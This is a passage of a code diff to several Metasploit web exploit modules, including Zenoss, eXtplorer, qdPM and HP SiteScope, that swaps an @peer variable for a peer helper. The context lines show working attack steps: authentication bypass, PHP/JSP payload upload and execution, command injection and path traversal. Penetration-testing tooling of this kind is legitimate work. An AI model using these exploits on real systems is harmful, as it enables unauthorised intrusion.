-    @peer = "#{rhost}:#{rport}"
     user  = datastore['USERNAME']
     pass  = datastore['PASSWORD']
     auth  = Rex::Text.encode_base64("#{user}:#{pass}")
@@ -98,7 +93,7 @@ class Metasploit3 < Msf::Exploit::Remote
     lines = rand(100) + 1
 
     # send payload
-    print_status("#{@peer} - Sending payload (#{payload.encoded.length} bytes)")
+    print_status("#{peer} - Sending payload (#{payload.encoded.length} bytes)")
     begin
       res = send_request_cgi({
         'uri'     => "/index.cgi?nlines=#{lines}&action=See+logs&id=2-2&filelog=#{cmd}",
diff --git a/modules/exploits/linux/http/zenoss_showdaemonxmlconfig_exec.rb b/modules/exploits/linux/http/zenoss_showdaemonxmlconfig_exec.rb
index 920bea7ce6..361d8d9ec4 100644
--- a/modules/exploits/linux/http/zenoss_showdaemonxmlconfig_exec.rb
+++ b/modules/exploits/linux/http/zenoss_showdaemonxmlconfig_exec.rb
@@ -63,9 +63,6 @@ class Metasploit3 < Msf::Exploit::Remote
   end
 
   def check
-
-    @peer = "#{rhost}:#{rport}"
-
     # retrieve software version from login page
     begin
       res = send_request_raw({
@@ -76,22 +73,20 @@ class Metasploit3 < Msf::Exploit::Remote
       return Exploit::CheckCode::Detected   if res.body =~ /<link rel="shortcut icon" type="image\/x\-icon" href="\/zport\/dmd\/favicon\.ico" \/>/
       return Exploit::CheckCode::Safe
     rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeoutp
-      print_error("#{@peer} - Connection failed")
+      print_error("#{peer} - Connection failed")
     end
     return Exploit::CheckCode::Unknown
 
   end
 
   def exploit
-
-    @peer    = "#{rhost}:#{rport}"
     username = datastore['USERNAME']
     password = datastore['PASSWORD']
     command  = URI.encode(payload.encoded)+"%26"
     postdata = "__ac_name=#{username}&__ac_password=#{password}&daemon=#{command}"
 
     # send payload
-    print_status("#{@peer} - Sending payload to Zenoss (#{command.length.to_s} bytes)")
+    print_status("#{peer} - Sending payload to Zenoss (#{command.length.to_s} bytes)")
     begin
       res = send_request_cgi({
         'method'    => 'POST',
@@ -99,14 +94,14 @@ class Metasploit3 < Msf::Exploit::Remote
         'data'      => "#{postdata}",
       })
       if res and res['Bobo-Exception-Type'] =~ /^Unauthorized$/
-        print_error("#{@peer} - Authentication failed. Incorrect username/password.")
+        print_error("#{peer} - Authentication failed. Incorrect username/password.")
         return
       end
-      print_status("#{@peer} - Sent payload successfully")
+      print_status("#{peer} - Sent payload successfully")
     rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout
-      print_error("#{@peer} - Connection failed")
+      print_error("#{peer} - Connection failed")
     rescue
-      print_error("#{@peer} - Sending payload failed")
+      print_error("#{peer} - Sending payload failed")
     end
 
     handler
diff --git a/modules/exploits/multi/http/auxilium_upload_exec.rb b/modules/exploits/multi/http/auxilium_upload_exec.rb
index ba8f440d9c..8fd8f46545 100644
--- a/modules/exploits/multi/http/auxilium_upload_exec.rb
+++ b/modules/exploits/multi/http/auxilium_upload_exec.rb
@@ -78,7 +78,7 @@ class Metasploit3 < Msf::Exploit::Remote
     post_data = data.to_s
     post_data = post_data.gsub(/^\r\n\-\-\_Part\_/, '--_Part_')
 
-    print_status("#{@peer} - Uploading payload (#{p.length.to_s} bytes)...")
+    print_status("#{peer} - Uploading payload (#{p.length.to_s} bytes)...")
     res = send_request_cgi({
       'method' => 'POST',
       'uri'    => normalize_uri("#{base}/admin/sitebanners/upload_banners.php"),
@@ -87,14 +87,14 @@ class Metasploit3 < Msf::Exploit::Remote
     })
 
     if not res
-      print_error("#{@peer} - No response from host")
+      print_error("#{peer} - No response from host")
       return
     end
 
-    print_status("#{@peer} - Requesting '#{php_fname}'...")
+    print_status("#{peer} - Requesting '#{php_fname}'...")
     res = send_request_raw({'uri'=>normalize_uri("#{base}/banners/#{php_fname}")})
     if res and res.code == 404
-      print_error("#{@peer} - Upload unsuccessful: #{res.code.to_s}")
+      print_error("#{peer} - Upload unsuccessful: #{res.code.to_s}")
       return
     end
 
@@ -103,8 +103,6 @@ class Metasploit3 < Msf::Exploit::Remote
 
 
   def exploit
-    @peer = "#{rhost}:#{rport}"
-
     uri = normalize_uri(target_uri.path)
     uri << '/' if uri[-1,1] != '/'
     base = File.dirname("#{uri}.")
diff --git a/modules/exploits/multi/http/cuteflow_upload_exec.rb b/modules/exploits/multi/http/cuteflow_upload_exec.rb
index 4e3543c9b4..c1003f7717 100644
--- a/modules/exploits/multi/http/cuteflow_upload_exec.rb
+++ b/modules/exploits/multi/http/cuteflow_upload_exec.rb
@@ -99,20 +99,19 @@ class Metasploit3 < Msf::Exploit::Remote
   def exploit
     base  = normalize_uri(target_uri.path)
     base << '/' if base[-1, 1] != '/'
-    @peer = "#{rhost}:#{rport}"
 
     # upload PHP payload to upload/___1/
-    print_status("#{@peer} - Uploading PHP payload (#{payload.encoded.length.to_s} bytes)")
+    print_status("#{peer} - Uploading PHP payload (#{payload.encoded.length.to_s} bytes)")
     fname = rand_text_alphanumeric(rand(10)+6) + '.php'
     php   = %Q|<?php #{payload.encoded} ?>|
     res   = upload(base, fname, php)
     if res.nil?
-      print_error("#{@peer} - Uploading PHP payload failed")
+      print_error("#{peer} - Uploading PHP payload failed")
       return
     end
 
     # retrieve and execute PHP payload
-    print_status("#{@peer} - Retrieving file: #{fname}")
+    print_status("#{peer} - Retrieving file: #{fname}")
     send_request_raw({
       'method' => 'GET',
       'uri'    => normalize_uri(base, "upload/___1/#{fname}")
diff --git a/modules/exploits/multi/http/extplorer_upload_exec.rb b/modules/exploits/multi/http/extplorer_upload_exec.rb
index cd5141baef..979bcf7497 100644
--- a/modules/exploits/multi/http/extplorer_upload_exec.rb
+++ b/modules/exploits/multi/http/extplorer_upload_exec.rb
@@ -135,22 +135,22 @@ class Metasploit3 < Msf::Exploit::Remote
 
     base  = target_uri.path
     base << '/' if base[-1, 1] != '/'
-    @peer = "#{rhost}:#{rport}"
+
     @fname= rand_text_alphanumeric(rand(10)+6) + '.php'
     user  = datastore['USERNAME']
     datastore['COOKIE'] = "eXtplorer="+rand_text_alpha_lower(26)+";"
 
     # bypass auth
-    print_status("#{@peer} - Authenticating as user (#{user})")
+    print_status("#{peer} - Authenticating as user (#{user})")
     res   = auth_bypass(base, user)
     if res and res.code == 200 and res.body =~ /Are you sure you want to delete these/
-      print_status("#{@peer} - Authenticated successfully")
+      print_status("#{peer} - Authenticated successfully")
     else
-      fail_with(Failure::NoAccess, "#{@peer} - Authentication failed")
+      fail_with(Failure::NoAccess, "#{peer} - Authentication failed")
     end
 
     # search for writable directories
-    print_status("#{@peer} - Retrieving writable subdirectories")
+    print_status("#{peer} - Retrieving writable subdirectories")
     begin
       res = send_request_cgi({
         'method'  => 'POST',
@@ -159,32 +159,32 @@ class Metasploit3 < Msf::Exploit::Remote
         'data'    => "option=com_extplorer&action=getdircontents&dir=#{base}&sendWhat=dirs&node=ext_root",
       })
     rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout
-      fail_with(Failure::Unreachable, "#{@peer} - Connection failed")
+      fail_with(Failure::Unreachable, "#{peer} - Connection failed")
     end
     if res and res.code == 200 and res.body =~ /\{'text':'([^']+)'[^\}]+'is_writable':true/
       dir = "#{base}#{$1}"
-      print_status("#{@peer} - Successfully retrieved writable subdirectory (#{$1})")
+      print_status("#{peer} - Successfully retrieved writable subdirectory (#{$1})")
     else
       dir = "#{base}"
-      print_error("#{@peer} - Could not find a writable subdirectory.")
+      print_error("#{peer} - Could not find a writable subdirectory.")
     end
 
     # upload PHP payload
-    print_status("#{@peer} - Uploading PHP payload (#{payload.encoded.length.to_s} bytes) to #{dir}")
+    print_status("#{peer} - Uploading PHP payload (#{payload.encoded.length.to_s} bytes) to #{dir}")
     php = %Q|<?php #{payload.encoded} ?>|
     begin
       res = upload(base, dir, @fname, php)
       if res and res.code == 200 and res.body =~ /'message':'Upload successful\!'/
-        print_good("#{@peer} - File uploaded successfully")
+        print_good("#{peer} - File uploaded successfully")
       else
-        fail_with(Failure::UnexpectedReply, "#{@peer} - Uploading PHP payload failed")
+        fail_with(Failure::UnexpectedReply, "#{peer} - Uploading PHP payload failed")
       end
     rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout
-      fail_with(Failure::Unreachable, "#{@peer} - Connection failed")
+      fail_with(Failure::Unreachable, "#{peer} - Connection failed")
     end
 
     # search directories in the web root for the file
-    print_status("#{@peer} - Searching directories for file (#{@fname})")
+    print_status("#{peer} - Searching directories for file (#{@fname})")
     begin
       res   = send_request_cgi({
         'method' => 'POST',
@@ -193,27 +193,27 @@ class Metasploit3 < Msf::Exploit::Remote
         'cookie' => datastore['COOKIE'],
       })
     rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout
-      fail_with(Failure::Unreachable, "#{@peer} - Connection failed")
+      fail_with(Failure::Unreachable, "#{peer} - Connection failed")
     end
     if res and res.code == 200 and res.body =~ /'dir':'\\\/([^']+)'/
       dir = $1.gsub('\\','')
-      print_good("#{@peer} - Successfully found file")
+      print_good("#{peer} - Successfully found file")
     else
-      print_error("#{@peer} - Failed to find file")
+      print_error("#{peer} - Failed to find file")
     end
 
     # retrieve and execute PHP payload
-    print_status("#{@peer} - Executing payload (/#{dir}/#{@fname})")
+    print_status("#{peer} - Executing payload (/#{dir}/#{@fname})")
     begin
       send_request_cgi({
         'method' => 'GET',
         'uri'    => "/#{dir}/#{@fname}"
       })
     rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout
-      fail_with(Failure::Unreachable, "#{@peer} - Connection failed")
+      fail_with(Failure::Unreachable, "#{peer} - Connection failed")
     end
     if res and res.code != 200
-      print_error("#{@peer} - Executing payload failed")
+      print_error("#{peer} - Executing payload failed")
     end
   end
 end
diff --git a/modules/exploits/multi/http/glossword_upload_exec.rb b/modules/exploits/multi/http/glossword_upload_exec.rb
index 7e70aecb6a..c224aac3f1 100644
--- a/modules/exploits/multi/http/glossword_upload_exec.rb
+++ b/modules/exploits/multi/http/glossword_upload_exec.rb
@@ -124,38 +124,37 @@ class Metasploit3 < Msf::Exploit::Remote
   def exploit
 
     base  = target_uri.path
-    @peer = "#{rhost}:#{rport}"
     @fname= rand_text_alphanumeric(rand(10)+6) + '.php'
     user  = datastore['USERNAME']
     pass  = datastore['PASSWORD']
 
     # login; get session id and token
-    print_status("#{@peer} - Authenticating as user '#{user}'")
+    print_status("#{peer} - Authenticating as user '#{user}'")
     res = login(base, user, pass)
     if res and res.code == 301 and res.headers['set-cookie'] =~ /sid([\da-f]+)=([\da-f]{32})/
       token = "#{$1}"
       sid   = "#{$2}"
-      print_good("#{@peer} - Authenticated successfully")
+      print_good("#{peer} - Authenticated successfully")
     else
-      fail_with(Failure::NoAccess, "#{@peer} - Authentication failed")
+      fail_with(Failure::NoAccess, "#{peer} - Authentication failed")
     end
 
     # upload PHP payload
-    print_status("#{@peer} - Uploading PHP payload (#{payload.encoded.length} bytes)")
+    print_status("#{peer} - Uploading PHP payload (#{payload.encoded.length} bytes)")
     php = %Q|<?php #{payload.encoded} ?>|
     begin
       res = upload(base, sid, @fname, php)
       if res and res.code == 301 and res['location'] =~ /Setting saved/
-        print_good("#{@peer} - File uploaded successfully")
+        print_good("#{peer} - File uploaded successfully")
       else
-        fail_with(Failure::UnexpectedReply, "#{@peer} - Uploading PHP payload failed")
+        fail_with(Failure::UnexpectedReply, "#{peer} - Uploading PHP payload failed")
       end
     rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout
-      fail_with(Failure::Unreachable, "#{@peer} - Connection failed")
+      fail_with(Failure::Unreachable, "#{peer} - Connection failed")
     end
 
     # retrieve PHP file path
-    print_status("#{@peer} - Locating PHP payload file")
+    print_status("#{peer} - Locating PHP payload file")
     begin
       res   = send_request_cgi({
         'method' => 'GET',
@@ -163,28 +162,28 @@ class Metasploit3 < Msf::Exploit::Remote
         'cookie' => "sid#{token}=#{sid}"
       })
     rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout
-      fail_with(Failure::Unreachable, "#{@peer} - Connection failed")
+      fail_with(Failure::Unreachable, "#{peer} - Connection failed")
     end
     if res and res.code == 200 and res.body =~ /<img width="" height="" src="([^"]+)"/
       shell_uri = "#{$1}"
       @fname    = shell_uri.match('(\d+_[a-zA-Z\d]+\.php)')
-      print_good("#{@peer} - Found payload file path (#{shell_uri})")
+      print_good("#{peer} - Found payload file path (#{shell_uri})")
     else
-      fail_with(Failure::UnexpectedReply, "#{@peer} - Failed to find PHP payload file path")
+      fail_with(Failure::UnexpectedReply, "#{peer} - Failed to find PHP payload file path")
     end
 
     # retrieve and execute PHP payload
-    print_status("#{@peer} - Executing payload (#{shell_uri})")
+    print_status("#{peer} - Executing payload (#{shell_uri})")
     begin
       send_request_cgi({
         'method' => 'GET',
         'uri'    => normalize_uri(base, shell_uri),
       })
     rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout
-      fail_with(Failure::Unreachable, "#{@peer} - Connection failed")
+      fail_with(Failure::Unreachable, "#{peer} - Connection failed")
     end
     if !res or res.code != 200
-      fail_with(Failure::UnexpectedReply, "#{@peer} - Executing payload failed")
+      fail_with(Failure::UnexpectedReply, "#{peer} - Executing payload failed")
     end
   end
 end
diff --git a/modules/exploits/multi/http/hp_sitescope_uploadfileshandler.rb b/modules/exploits/multi/http/hp_sitescope_uploadfileshandler.rb
index 5432929725..825701d651 100644
--- a/modules/exploits/multi/http/hp_sitescope_uploadfileshandler.rb
+++ b/modules/exploits/multi/http/hp_sitescope_uploadfileshandler.rb
@@ -84,20 +84,19 @@ class Metasploit3 < Msf::Exploit::Remote
   end
 
   def exploit
-    @peer = "#{rhost}:#{rport}"
     @uri = normalize_uri(target_uri.path)
     @uri << '/' if @uri[-1,1] != '/'
 
     # Create user with empty credentials
-    print_status("#{@peer} - Creating user with empty credentials")
+    print_status("#{peer} - Creating user with empty credentials")
 
     if create_user.nil?
-      print_error("#{@peer} - Failed to create user")
+      print_error("#{peer} - Failed to create user")
       return
     end
 
     # Generate an initial JSESSIONID
-    print_status("#{@peer} - Retrieving an initial JSESSIONID")
+    print_status("#{peer} - Retrieving an initial JSESSIONID")
     res = send_request_cgi(
       'uri'    => normalize_uri(@uri, 'servlet/Main'),
       'method' => 'POST'
@@ -106,14 +105,14 @@ class Metasploit3 < Msf::Exploit::Remote
     if res and res.code == 200 and res.headers['Set-Cookie'] =~ /JSESSIONID=([0-9A-F]*);/
       session_id = $1
     else
-      print_error("#{@peer} - Retrieve of initial JSESSIONID failed")
+      print_error("#{peer} - Retrieve of initial JSESSIONID failed")
       return
     end
 
     # Authenticate
     login_data = "j_username=&j_password="
 
-    print_status("#{@peer} - Authenticating on HP SiteScope Configuration")
+    print_status("#{peer} - Authenticating on HP SiteScope Configuration")
     res = send_request_cgi(
       {
         'uri'    => normalize_uri(@uri, 'j_security_check'),
@@ -130,12 +129,12 @@ class Metasploit3 < Msf::Exploit::Remote
       session_id = $1
       redirect =  URI(res.headers['Location']).path
     else
-      print_error("#{@peer} - Authentication on SiteScope failed")
+      print_error("#{peer} - Authentication on SiteScope failed")
       return
     end
 
     # Follow redirection to complete authentication process
-    print_status("#{@peer} - Following redirection to finish authentication")
+    print_status("#{peer} - Following redirection to finish authentication")
     res = send_request_cgi(
       {
         'uri' => redirect,
@@ -147,7 +146,7 @@ class Metasploit3 < Msf::Exploit::Remote
       })
 
     if not res or res.code != 200
-      print_error("#{@peer} - Authentication on SiteScope failed")
+      print_error("#{peer} - Authentication on SiteScope failed")
       return
     end
 
@@ -235,7 +234,7 @@ class Metasploit3 < Msf::Exploit::Remote
       traversal = "..\\..\\..\\..\\..\\..\\"
     end
 
-    print_status("#{@peer} - Uploading the payload")
+    print_status("#{peer} - Uploading the payload")
     res = send_request_cgi(
       {
         'uri'    => "#{@uri}upload?REMOTE_HANDLER_KEY=UploadFilesHandler&UploadFilesHandler.file.name=#{traversal}#{@var_hexfile}.txt&UploadFilesHandler.ovveride=true",
@@ -250,16 +249,16 @@ class Metasploit3 < Msf::Exploit::Remote
 
     if res and res.code == 200 and res.body =~ /file: (.*) uploaded succesfuly to server/
       path = $1
-      print_good("#{@peer} - Payload successfully uploaded to #{path}")
+      print_good("#{peer} - Payload successfully uploaded to #{path}")
     else
-      print_error("#{@peer} - Error uploading the Payload")
+      print_error("#{peer} - Error uploading the Payload")
       return
     end
 
     post_data = Rex::MIME::Message.new
     post_data.add_part(jspraw, "application/octet-stream", nil, "form-data; name=\"#{rand_text_alpha(4)}\"; filename=\"#{rand_text_alpha(4)}.png\"")
 
-    print_status("#{@peer} - Uploading the JSP")
+    print_status("#{peer} - Uploading the JSP")
     res = send_request_cgi(
       {
         'uri'    => normalize_uri(@uri, 'upload') + "?REMOTE_HANDLER_KEY=UploadFilesHandler&UploadFilesHandler.file.name=#{traversal}#{@jsp_name}.jsp&UploadFilesHandler.ovveride=true",
@@ -274,9 +273,9 @@ class Metasploit3 < Msf::Exploit::Remote
 
     if res and res.code == 200 and res.body =~ /file: (.*) uploaded succesfuly to server/
       path = $1
-      print_good("#{@peer} - JSP successfully uploaded to #{path}")
+      print_good("#{peer} - JSP successfully uploaded to #{path}")
     else
-      print_error("#{@peer} - Error uploading the JSP")
+      print_error("#{peer} - Error uploading the JSP")
       return
     end
 
diff --git a/modules/exploits/multi/http/kordil_edms_upload_exec.rb b/modules/exploits/multi/http/kordil_edms_upload_exec.rb
index df347813ec..8a695a956f 100644
--- a/modules/exploits/multi/http/kordil_edms_upload_exec.rb
+++ b/modules/exploits/multi/http/kordil_edms_upload_exec.rb
@@ -101,32 +101,31 @@ class Metasploit3 < Msf::Exploit::Remote
   def exploit
 
     base   = target_uri.path
-    @peer  = "#{rhost}:#{rport}"
     @fname = rand_text_numeric(7)
 
     # upload PHP payload to userpictures/[fname].php
-    print_status("#{@peer} - Uploading PHP payload (#{payload.encoded.length} bytes)")
+    print_status("#{peer} - Uploading PHP payload (#{payload.encoded.length} bytes)")
     php    = %Q|<?php #{payload.encoded} ?>|
     begin
       res = upload(base, php)
       if res and res.code == 302 and res.headers['Location'] =~ /\.\/user_account\.php\?/
-        print_good("#{@peer} - File uploaded successfully")
+        print_good("#{peer} - File uploaded successfully")
       else
-        fail_with(Failure::UnexpectedReply, "#{@peer} - Uploading PHP payload failed")
+        fail_with(Failure::UnexpectedReply, "#{peer} - Uploading PHP payload failed")
       end
     rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout
-      fail_with(Failure::Unreachable, "#{@peer} - Connection failed")
+      fail_with(Failure::Unreachable, "#{peer} - Connection failed")
     end
 
     # retrieve and execute PHP payload
-    print_status("#{@peer} - Executing payload (userpictures/#{@fname}.php)")
+    print_status("#{peer} - Executing payload (userpictures/#{@fname}.php)")
     begin
       res = send_request_cgi({
         'method' => 'GET',
         'uri'    => normalize_uri(base, 'userpictures', "#{@fname}.php")
       })
     rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout
-      fail_with(Failure::Unreachable, "#{@peer} - Connection failed")
+      fail_with(Failure::Unreachable, "#{peer} - Connection failed")
     end
 
   end
diff --git a/modules/exploits/multi/http/mobilecartly_upload_exec.rb b/modules/exploits/multi/http/mobilecartly_upload_exec.rb
index 600f83c3ea..fb620413ae 100644
--- a/modules/exploits/multi/http/mobilecartly_upload_exec.rb
+++ b/modules/exploits/multi/http/mobilecartly_upload_exec.rb
@@ -72,8 +72,6 @@ class Metasploit3 < Msf::Exploit::Remote
 
 
   def exploit
-    @peer = "#{rhost}:#{rport}"
-
     #
     # Init target path
     #
@@ -89,7 +87,7 @@ class Metasploit3 < Msf::Exploit::Remote
     #
     # Upload payload
     #
-    print_status("#{@peer} - Uploading payload")
+    print_status("#{peer} - Uploading payload")
     res = send_request_cgi({
       'uri' => normalize_uri(base, "/includes/savepage.php"),
       'vars_get' => {
@@ -99,14 +97,14 @@ class Metasploit3 < Msf::Exploit::Remote
     })
 
     if not res
-      print_error("#{@peer} - No response from server, will not continue.")
+      print_error("#{peer} - No response from server, will not continue.")
       return
     end
 
     #
     # Run payload
     #
-    print_status("#{@peer} - Requesting '#{php_fname}'")
+    print_status("#{peer} - Requesting '#{php_fname}'")
     send_request_cgi({ 'uri' => normalize_uri(base, 'pages', php_fname) })
 
     handler
diff --git a/modules/exploits/multi/http/movabletype_upgrade_exec.rb b/modules/exploits/multi/http/movabletype_upgrade_exec.rb
index 146bee3ebc..0996cd97a4 100644
--- a/modules/exploits/multi/http/movabletype_upgrade_exec.rb
+++ b/modules/exploits/multi/http/movabletype_upgrade_exec.rb
@@ -69,9 +69,8 @@ class Metasploit4 < Msf::Exploit::Remote
   end
 
   def check
-    @peer = "#{rhost}:#{rport}"
     fingerprint = rand_text_alpha(5)
-    print_status("#{@peer} - Sending check...")
+    print_status("#{peer} - Sending check...")
     begin
       res = http_send_raw(fingerprint)
     rescue Rex::ConnectionError
@@ -91,8 +90,7 @@ class Metasploit4 < Msf::Exploit::Remote
   end
 
   def exploit
-    @peer = "#{rhost}:#{rport}"
-    print_status("#{@peer} - Sending payload...")
+    print_status("#{peer} - Sending payload...")
     http_send_cmd(payload.encoded)
   end
 
diff --git a/modules/exploits/multi/http/php_volunteer_upload_exec.rb b/modules/exploits/multi/http/php_volunteer_upload_exec.rb
index 1b49214b5c..a885cb3901 100644
--- a/modules/exploits/multi/http/php_volunteer_upload_exec.rb
+++ b/modules/exploits/multi/http/php_volunteer_upload_exec.rb
@@ -75,7 +75,7 @@ class Metasploit3 < Msf::Exploit::Remote
     # If we don't get a cookie, bail!
     if res and res.headers['Set-Cookie'] =~ /(PHPVolunteerManagent=\w+);*/
       cookie = $1
-      vprint_status("#{@peer} - Found cookie: #{cookie}")
+      vprint_status("#{peer} - Found cookie: #{cookie}")
     else
       return nil
     end
@@ -189,56 +189,54 @@ class Metasploit3 < Msf::Exploit::Remote
     base = normalize_uri(target_uri.path)
     base << '/' if base[-1, 1] != '/'
 
-    @peer = "#{rhost}:#{rport}"
-
     # Login
     username = datastore['USERNAME']
     password = datastore['PASSWORD']
     cookie = login(base, username, password)
     if cookie.nil?
-      print_error("#{@peer} - Login failed with \"#{username}:#{password}\"")
+      print_error("#{peer} - Login failed with \"#{username}:#{password}\"")
       return
     end
 
-    print_status("#{@peer} - Login successful with #{username}:#{password}")
+    print_status("#{peer} - Login successful with #{username}:#{password}")
 
     # Take a snapshot of the uploads directory
     # Viewing this doesn't actually require the user to login first,
     # but we supply the cookie anyway to act more like a real user.
-    print_status("#{@peer} - Enumerating all the uploads...")
+    print_status("#{peer} - Enumerating all the uploads...")
     before = peek_uploads(base, cookie)
     if before.nil?
-      print_error("#{@peer} - Unable to enumerate original uploads")
+      print_error("#{peer} - Unable to enumerate original uploads")
       return
     end
 
     # Upload our PHP shell
-    print_status("#{@peer} - Uploading PHP payload (#{payload.encoded.length.to_s} bytes)")
+    print_status("#{peer} - Uploading PHP payload (#{payload.encoded.length.to_s} bytes)")
     fname = rand_text_alpha(rand(10)+6) + '.php'
     desc  = rand_text_alpha(rand(10)+5)
     php   = %Q|<?php #{payload.encoded} ?>|
     res = upload(base, cookie, fname, php, desc)
     if res.nil? or res.body !~ /The file was successfuly uploaded/
-      print_error("#{@peer} - Failed to upload our file")
+      print_error("#{peer} - Failed to upload our file")
       return
     end
 
     # Now that we've uploaded our shell, let's take another snapshot
     # of the uploads directory.
-    print_status("#{@peer} - Enumerating new uploads...")
+    print_status("#{peer} - Enumerating new uploads...")
     after = peek_uploads(base, cookie)
     if after.nil?
-      print_error("#{@peer} - Unable to enumerate latest uploads")
+      print_error("#{peer} - Unable to enumerate latest uploads")
       return
     end
 
     # Find the filename of our uploaded shell
     files = get_my_file(before.body, after.body)
     if files.empty?
-      print_error("#{@peer} - No new file(s) found. The upload probably failed.")
+      print_error("#{peer} - No new file(s) found. The upload probably failed.")
       return
     else
-      vprint_status("#{@peer} - Found these new files: #{files.inspect}")
+      vprint_status("#{peer} - Found these new files: #{files.inspect}")
     end
 
     # There might be more than 1 new file, at least execute the first 10
diff --git a/modules/exploits/multi/http/qdpm_upload_exec.rb b/modules/exploits/multi/http/qdpm_upload_exec.rb
index b99094e805..e993e72f42 100644
--- a/modules/exploits/multi/http/qdpm_upload_exec.rb
+++ b/modules/exploits/multi/http/qdpm_upload_exec.rb
@@ -93,7 +93,7 @@ class Metasploit3 < Msf::Exploit::Remote
     end
 
     @clean_files.each do |f|
-      print_warning("#{@peer} - Removing: #{f}")
+      print_warning("#{peer} - Removing: #{f}")
       begin
         if cli.type == 'meterpreter'
           cli.fs.file.rm(f)
@@ -101,7 +101,7 @@ class Metasploit3 < Msf::Exploit::Remote
           cli.shell_command_token("rm #{f}")
         end
       rescue ::Exception => e
-        print_error("#{@peer} - Unable to remove #{f}: #{e.message}")
+        print_error("#{peer} - Unable to remove #{f}: #{e.message}")
       end
     end
   end
@@ -129,7 +129,7 @@ class Metasploit3 < Msf::Exploit::Remote
     cookie = cookie.to_s.scan(/(qdpm\=\w+)\;/).flatten[0]
 
     # Get user data
-    vprint_status("#{@peer} - Enumerating user data")
+    vprint_status("#{peer} - Enumerating user data")
     res = send_request_raw({
       'uri' => "#{base}/index.php/home/myAccount",
       'cookie' => cookie
@@ -137,7 +137,7 @@ class Metasploit3 < Msf::Exploit::Remote
 
     return {} if not res
     if res.code == 404
-      print_error("#{@peer} - #{username} does not actually have a 'myAccount' page")
+      print_error("#{peer} - #{username} does not actually have a 'myAccount' page")
       return {}
     end
 
@@ -208,35 +208,33 @@ class Metasploit3 < Msf::Exploit::Remote
     })
 
     if not res
-      print_error("#{@peer} - Unable to request the file")
+      print_error("#{peer} - Unable to request the file")
       return
     end
 
     fname = res.body.scan(/\<input type\=\"hidden\" name\=\"preview\_photo\" id\=\"preview\_photo\" value\=\"(\d+\-\w+\.php)\" \/\>/).flatten[0] || ''
     if fname.empty?
-      print_error("#{@peer} - Unable to extract the real filename")
+      print_error("#{peer} - Unable to extract the real filename")
       return
     end
 
     # Now that we have the filename, request it
-    print_status("#{@peer} - Uploaded file was renmaed as '#{fname}'")
+    print_status("#{peer} - Uploaded file was renmaed as '#{fname}'")
     send_request_raw({'uri'=>"#{base}/uploads/users/#{fname}"})
     handler
   end
 
   def exploit
-    @peer = "#{rhost}:#{rport}"
-
     uri = normalize_uri(target_uri.path)
     uri << '/' if uri[-1,1] != '/'
     base = File.dirname("#{uri}.")
 
     user = datastore['USERNAME']
     pass = datastore['PASSWORD']
-    print_status("#{@peer} - Attempt to login with '#{user}:#{pass}'")
+    print_status("#{peer} - Attempt to login with '#{user}:#{pass}'")
     opts = login(base, user, pass)
     if opts.empty?
-      print_error("#{@peer} - Login unsuccessful")
+      print_error("#{peer} - Login unsuccessful")
       return
     end
 
@@ -253,7 +251,7 @@ class Metasploit3 < Msf::Exploit::Remote
       p = get_write_exec_payload("/tmp/#{bin_name}", bin)
     end
 
-    print_status("#{@peer} - Uploading PHP payload (#{p.length.to_s} bytes)...")
+    print_status("#{peer} - Uploading PHP payload (#{p.length.to_s} bytes)...")
     opts = opts.merge({
       'username' => user.scan(/^(.+)\@.+/).flatten[0] || '',
       'email'    => user,
@@ -262,11 +260,11 @@ class Metasploit3 < Msf::Exploit::Remote
     })
     uploader = upload_php(base, opts)
     if not uploader
-      print_error("#{@peer} - Unable to upload")
+      print_error("#{peer} - Unable to upload")
       return
     end
 
-    print_status("#{@peer} - Executing '#{php_fname}'")
+    print_status("#{peer} - Executing '#{php_fname}'")
     exec_php(base, opts)
   end
 end
diff --git a/modules/exploits/multi/http/sflog_upload_exec.rb b/modules/exploits/multi/http/sflog_upload_exec.rb
index f96e0fc4e5..47acbdae69 100644
--- a/modules/exploits/multi/http/sflog_upload_exec.rb
+++ b/modules/exploits/multi/http/sflog_upload_exec.rb
@@ -108,7 +108,7 @@ class Metasploit3 < Msf::Exploit::Remote
     post_data = data.to_s
     post_data = post_data.gsub(/^\r\n\-\-\_Part\_/, '--_Part_')
 
-    print_status("#{@peer} - Uploading payload (#{p.length.to_s} bytes)...")
+    print_status("#{peer} - Uploading payload (#{p.length.to_s} bytes)...")
     res = send_request_cgi({
       'method' => 'POST',
       'uri'    => "#{base}/admin/manage.php",
@@ -122,15 +122,15 @@ class Metasploit3 < Msf::Exploit::Remote
     })
 
     if not res
-      print_error("#{@peer} - No response from host")
+      print_error("#{peer} - No response from host")
       return
     end
 
     target_path = "#{base}/blogs/download/uploads/#{php_fname}"
-    print_status("#{@peer} - Requesting '#{target_path}'...")
+    print_status("#{peer} - Requesting '#{target_path}'...")
     res = send_request_raw({'uri'=>target_path})
     if res and res.code == 404
-      print_error("#{@peer} - Upload unsuccessful: #{res.code.to_s}")
+      print_error("#{peer} - Upload unsuccessful: #{res.code.to_s}")
       return
     end
 
@@ -139,17 +139,15 @@ class Metasploit3 < Msf::Exploit::Remote
 
 
   def exploit
-    @peer = "#{rhost}:#{rport}"
-
     uri = normalize_uri(target_uri.path)
     uri << '/' if uri[-1,1] != '/'
     base = File.dirname("#{uri}.")
 
-    print_status("#{@peer} - Attempt to login as '#{datastore['USERNAME']}:#{datastore['PASSWORD']}'")
+    print_status("#{peer} - Attempt to login as '#{datastore['USERNAME']}:#{datastore['PASSWORD']}'")
     cookie = do_login(base)
 
     if cookie.empty?
-      print_error("#{@peer} - Unable to login")
+      print_error("#{peer} - Unable to login")
       return
     end
 
